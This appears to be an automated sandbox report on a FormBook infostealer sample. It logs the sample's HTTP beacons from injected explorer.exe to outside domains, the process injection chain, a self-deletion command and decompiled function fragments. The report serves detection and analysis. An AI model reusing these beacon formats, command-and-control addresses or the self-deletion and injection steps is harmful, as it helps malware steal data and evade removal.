Aug 3, 2021 18:07:17.910999060 CEST	3922	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Tue, 03 Aug 2021 16:07:17 GMT Content-Type: text/html Content-Length: 275 ETag: "6104831f-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.6	49732	184.168.131.241	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 3, 2021 18:07:23.147452116 CEST	3923	OUT	GET /weni/?Fzr4otMh=BkpYm0nbd5ib+/fSGFV7l4XaMZIYy+faJJ1LkwLIu9AW6SncOXGggY2R9QUt+6zEXxQtwdedUg==&aRbdj=q6AlsppXkR0txTj HTTP/1.1 Host: www.profitsnavigator.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 3, 2021 18:07:23.338002920 CEST	3923	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.16.1 Date: Tue, 03 Aug 2021 16:07:23 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Location: https://roipanel.com?link&usr=5291&lid=10053&source=FBprofile Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.6	49734	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 3, 2021 18:07:28.445873022 CEST	3924	OUT	GET /weni/?Fzr4otMh=ztAjwXyjR8Zhmz6qNG99UeVM/COU9vlr0gZS07ceR8+f8+nH1SwRALtGHqnV1JfTHENGVYv16A==&aRbdj=q6AlsppXkR0txTj HTTP/1.1 Host: www.konversationswithkoshie.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 3, 2021 18:07:28.559362888 CEST	3925	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Tue, 03 Aug 2021 16:07:28 GMT Content-Type: text/html Content-Length: 275 ETag: "6104856e-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.6	49737	104.168.135.142	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 3, 2021 18:07:33.871361971 CEST	3935	OUT	GET /weni/?Fzr4otMh=+KyOLC6TyuKR3+iFgbwKS8GxhsjIjrhtsitDR0G1PeYPvoj9xIz7F4EITJbrl7lY/KKYumYMjw==&aRbdj=q6AlsppXkR0txTj HTTP/1.1 Host: www.advancedautorepairsonline.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 3, 2021 18:07:34.070441008 CEST	3935	IN	HTTP/1.1 403 Forbidden content-type: text/html content-length: 206 x-powered-by: PHP/5.6.40 connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 77 65 6e 69 2f 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /weni/ on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.6	49740	107.165.13.75	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 3, 2021 18:07:39.743015051 CEST	4012	OUT	GET /weni/?Fzr4otMh=jQINVx1WLgI4Q78PxoFZgdCbTp62zPlUZKvRDpdtPyf3UmqyZOBTcqkgr6daQI/TgYuIT4+N1g==&aRbdj=q6AlsppXkR0txTj HTTP/1.1 Host: www.lovertons.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.6	49748	45.39.95.186	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 3, 2021 18:07:57.333901882 CEST	4938	OUT	GET /weni/?Fzr4otMh=9kFoto4nIUhkgP3Es+H36/ZMz7ns/MT8S+V4osXmeDelDelWvdLQo7Pbd8Te03qiHXqAR+RcrA==&aRbdj=q6AlsppXkR0txTj HTTP/1.1 Host: www.utformehagen.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 3, 2021 18:07:57.519463062 CEST	4938	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 03 Aug 2021 16:07:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Data Raw: 31 0d 0a 2e 0d 0a 30 0d 0a 0d 0a Data Ascii: 1.0

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: 9JzK89dRiaBYTuN.exe PID: 6048 Parent PID: 5976

General

Start time:	18:06:00
Start date:	03/08/2021
Path:	C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe'
Imagebase:	0x1c0000
File size:	1263616 bytes
MD5 hash:	D726EC6E056461DD7D3CE8890C3C9A4E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.341797161.0000000002541000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.342547133.0000000003549000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.342547133.0000000003549000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.342547133.0000000003549000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: RegSvcs.exe PID: 4260 Parent PID: 6048

General

Start time:	18:06:05
Start date:	03/08/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Imagebase:	0xfd0000
File size:	45152 bytes
MD5 hash:	2867A3817C9245F7CF518524DFD18F28
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.396448884.0000000001990000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.396448884.0000000001990000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.396448884.0000000001990000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.396143865.0000000001470000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.396143865.0000000001470000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.396143865.0000000001470000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.395997570.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.395997570.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.395997570.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Chronological Activities

Analysis Process: explorer.exe PID: 3440 Parent PID: 4260

General

Start time:	18:06:07
Start date:	03/08/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff6f22f0000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: autofmt.exe PID: 4024 Parent PID: 3440

General

Start time:	18:06:28
Start date:	03/08/2021
Path:	C:\Windows\SysWOW64\autofmt.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\SysWOW64\autofmt.exe
Imagebase:	0x330000
File size:	831488 bytes
MD5 hash:	7FC345F685C2A58283872D851316ACC4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: cmmon32.exe PID: 2904 Parent PID: 3440

General

Start time:	18:06:28
Start date:	03/08/2021
Path:	C:\Windows\SysWOW64\cmmon32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cmmon32.exe
Imagebase:	0x900000
File size:	36864 bytes
MD5 hash:	2879B30A164B9F7671B5E6B2E9F8DFDA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.598731483.00000000008D0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.598731483.00000000008D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.598731483.00000000008D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.603676182.0000000002CC0000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.603676182.0000000002CC0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.603676182.0000000002CC0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.598176527.0000000000770000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.598176527.0000000000770000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.598176527.0000000000770000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 6076 Parent PID: 2904

General

Start time:	18:06:32
Start date:	03/08/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
Imagebase:	0x2a0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 2924 Parent PID: 6076

General

Start time:	18:06:33
Start date:	03/08/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff61de10000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: 9JzK89dRiaBYTuN.exe PID: 6048 Parent PID: 5976 9JzK89dRiaBYTuN.exeCOMMON

Executed Functions

Function 0241F30C, Relevance: 1.6, APIs: 1, Instructions: 119COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0241F42A

Memory Dump Source

Source File: 00000000.00000002.341744585.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 447477d622f5928e65c475f8edaf6d3f89e9ea9a57839aa2701b929ec7e342ae
Instruction ID: df69de4aa82f255b13ff53b47528bc822708b4da435e6b1c6fcba0acb6695d36
Opcode Fuzzy Hash: 447477d622f5928e65c475f8edaf6d3f89e9ea9a57839aa2701b929ec7e342ae
Instruction Fuzzy Hash: 9A51D2B1D003099FDB14CF99C884ADEBFB1FF48314F25812AE819AB610D7749846CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0241D424, Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0241F42A

Memory Dump Source

Source File: 00000000.00000002.341744585.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: ff1b7d1ec415dd05a57723fdf63dc02f75916362c34ba11de08e2d33c85aef16
Instruction ID: d9d6a3eaefa91d756c858b304244d305443b12911ca95c12fbfcc6e4bb5896f4
Opcode Fuzzy Hash: ff1b7d1ec415dd05a57723fdf63dc02f75916362c34ba11de08e2d33c85aef16
Instruction Fuzzy Hash: 5251C0B1D003089FDB14CF99D884ADEBBB5FF48314F25822AE819AB610D7749986CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0241B010, Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0241AFDE,?,?,?,?,?), ref: 0241B09F

Memory Dump Source

Source File: 00000000.00000002.341744585.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 6c9948291e9e55f49536d75b513ce0094661b22eb85c46670cd450466453a542
Instruction ID: 8207a3d9b36c4cdf9a998a2a4177dc6a1de41a5c2926a42d435699b4afc698c6
Opcode Fuzzy Hash: 6c9948291e9e55f49536d75b513ce0094661b22eb85c46670cd450466453a542
Instruction Fuzzy Hash: BC21E2B5901208AFDB10CFA9D984ADEFFF4FB48324F14841AE918A7310D378A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02419834, Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0241AFDE,?,?,?,?,?), ref: 0241B09F

Memory Dump Source

Source File: 00000000.00000002.341744585.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 88c3c59cb04a0e41d449ff50fb0c377e0fd1a7ed3b341b71b4ac535450b3d253
Instruction ID: 2792e01a19e7d30d2e66db646cdd698e7c699c4d00109f19e6c9a9b9cebee75d
Opcode Fuzzy Hash: 88c3c59cb04a0e41d449ff50fb0c377e0fd1a7ed3b341b71b4ac535450b3d253
Instruction Fuzzy Hash: 9F21E4B5901208AFDB10CFA9D984ADEBFF8FB48324F14845AE914B7310D374A954CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02417E30, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02418DC9,00000800,00000000,00000000), ref: 02418FDA

Memory Dump Source

Source File: 00000000.00000002.341744585.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: b4c9c8d659f0f7d2aaac1e56585cfde8df8720a81d49e96439a4acbb64fa087a
Instruction ID: 33398a536dcba5f1587b09e7db5485b2425962bba6d719efdc9cb950a18ad61a
Opcode Fuzzy Hash: b4c9c8d659f0f7d2aaac1e56585cfde8df8720a81d49e96439a4acbb64fa087a
Instruction Fuzzy Hash: 2E1103B69042099FEB10CF9AC844BDEFBF5EB88314F14842AE51AB7300C774A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 02418F68, Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02418DC9,00000800,00000000,00000000), ref: 02418FDA

Memory Dump Source

Source File: 00000000.00000002.341744585.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: af6b313d66371e934248d171a4164c869dee0e56f265aeb38d9609f65e824ec9
Instruction ID: fbd608cf45a51c88f8f8135c3303084e640971ae358c68805219ac085fafbdb0
Opcode Fuzzy Hash: af6b313d66371e934248d171a4164c869dee0e56f265aeb38d9609f65e824ec9
Instruction Fuzzy Hash: 2B1112B29002498FDB10CF9AD444BDEFBF5EB88324F14846EE429A7700C778A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 02418CE6, Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 02418D4E

Memory Dump Source

Source File: 00000000.00000002.341744585.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 4d01eac2d331237eb40c72f7ad813701f0ad2ca8f6b66999db8156ff0ffff221
Instruction ID: 871dc6dce184b6d4adc59be43730ca64163911adf74cd6588b3322425ecf5a4a
Opcode Fuzzy Hash: 4d01eac2d331237eb40c72f7ad813701f0ad2ca8f6b66999db8156ff0ffff221
Instruction Fuzzy Hash: 5611DFB5D017498FDB20CF9AD544BDEFBF4EF88224F14846AD829A7600D378A546CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02418CE8, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 02418D4E

Memory Dump Source

Source File: 00000000.00000002.341744585.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 47b19f61f4fd9daf6c576db62c3f87c86aa0f6b2a3db59ac1c29b50e99e8977d
Instruction ID: e5c58ad3c69c3f21227e2ed2cfcc312938432f81565ec49dd5cfe521b8931d9b
Opcode Fuzzy Hash: 47b19f61f4fd9daf6c576db62c3f87c86aa0f6b2a3db59ac1c29b50e99e8977d
Instruction Fuzzy Hash: 5911CDB59007498FDB20CF9AD544ADEBBF4AF88224F14846AD829A7600D378A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0097D4C4, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.341428978.000000000097D000.00000040.00000001.sdmp, Offset: 0097D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f23e4a09d9056806076379f942754255c55d2709b8f3f4dc6bd0ea916f363ca6
Instruction ID: d86c6519d2b30bfa7af28108d8382fc695b25676e30523f98213fa63f274170a
Opcode Fuzzy Hash: f23e4a09d9056806076379f942754255c55d2709b8f3f4dc6bd0ea916f363ca6
Instruction Fuzzy Hash: 4B210672504240DFDB05DF14D9C0B26BF79FF88328F24C969E9091B24AC33AD856D7A2

Uniqueness

Uniqueness Score: -1.00%

Function 00D5D01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.341610142.0000000000D5D000.00000040.00000001.sdmp, Offset: 00D5D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fceec16f165fcfe270e148a086d3546dd425dc1708d69db4b3c94911b79427c1
Instruction ID: 1f4f99cc78c9cb37d118411ea834c47335fe639c3d6fa4e4f19ddf5e064e68fc
Opcode Fuzzy Hash: fceec16f165fcfe270e148a086d3546dd425dc1708d69db4b3c94911b79427c1
Instruction Fuzzy Hash: A121D071504240DFDF24DF28D9C4B16BB66EB88325F24C969EC494B386C33AD84BCA72

Uniqueness

Uniqueness Score: -1.00%

Function 00D5D005, Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.341610142.0000000000D5D000.00000040.00000001.sdmp, Offset: 00D5D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb947c71a87d4df9ea9220f4ed0000677d2f992e68d7723061832cb4b0cdcd72
Instruction ID: e1e71dc12964420d301d8e23639223a9bb55bde2a64b2ec1ab072e434f8db0d2
Opcode Fuzzy Hash: fb947c71a87d4df9ea9220f4ed0000677d2f992e68d7723061832cb4b0cdcd72
Instruction Fuzzy Hash: 12217F755093808FCB12CF24D994715BF71EB46214F28C5EADC498B6A7C33A980ACB72

Uniqueness

Uniqueness Score: -1.00%

Function 0097D4BF, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.341428978.000000000097D000.00000040.00000001.sdmp, Offset: 0097D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf6f911b96cd926d5ec4c359b7ca446b582c99ed5d68efd31eb8ad46abb8db7a
Instruction ID: d76f5e5d9f03462f3d15d0078a1946b822e5237b6b0ddeab3b6b607e34f63bcf
Opcode Fuzzy Hash: cf6f911b96cd926d5ec4c359b7ca446b582c99ed5d68efd31eb8ad46abb8db7a
Instruction Fuzzy Hash: 6411D376404280CFCB11CF10D5C4B16BF71FF84324F28C6A9E8490B65AC336D85ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0097D731, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.341428978.000000000097D000.00000040.00000001.sdmp, Offset: 0097D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b198a99e67f795db5c3c856656f6f8e19961e615076b6aaa5b537b9d7bbc00e
Instruction ID: 5109ffac80b68e9780cd5fd47e624b3347cdbbd2d228ac51f02fc1e13d3aabbf
Opcode Fuzzy Hash: 4b198a99e67f795db5c3c856656f6f8e19961e615076b6aaa5b537b9d7bbc00e
Instruction Fuzzy Hash: A801A7B240A3449AE7148A25CDC4BA7BBECEF51334F18C959ED095F242D7789C44D6B1

Uniqueness

Uniqueness Score: -1.00%

Function 0097D730, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.341428978.000000000097D000.00000040.00000001.sdmp, Offset: 0097D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c8e4f57b6d8a10ecf96df1a8228ba0eeb3b22d73f5c8d858f61438cac2688ae
Instruction ID: 6c45f8207133d580f71ce5397470f3f56392ace6e5652c7152ede4aa751997f6
Opcode Fuzzy Hash: 7c8e4f57b6d8a10ecf96df1a8228ba0eeb3b22d73f5c8d858f61438cac2688ae
Instruction Fuzzy Hash: DCF062B2409244AEE7148E15CD84BA2FFACEF91734F18C55AED085B282C3799844CAB1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: RegSvcs.exe PID: 4260 Parent PID: 6048 RegSvcs.exeCOMMON

Executed Functions

Function 00418270, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00418270(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E00418DC0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x413d52
				_t12 =  &_a8; // 0x413d52
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}

0x00418273
0x0041827f
0x00418287
0x00418292
0x004182ad
0x004182b5
0x004182b9

APIs

NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5

Strings

R=A, xrefs: 00418292, 004182A0
R=A, xrefs: 004182AD, 004182B4

Memory Dump Source

Source File: 00000001.00000002.395997570.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: R=A$R=A
API String ID: 2738559852-3742021989
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: 44195af4cfcd7844dc5464a96f27935e8bb9154da72c22cdf586d036b66e8624
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 8EF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158649BA1D97241DA30E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00409B20, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409B20(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
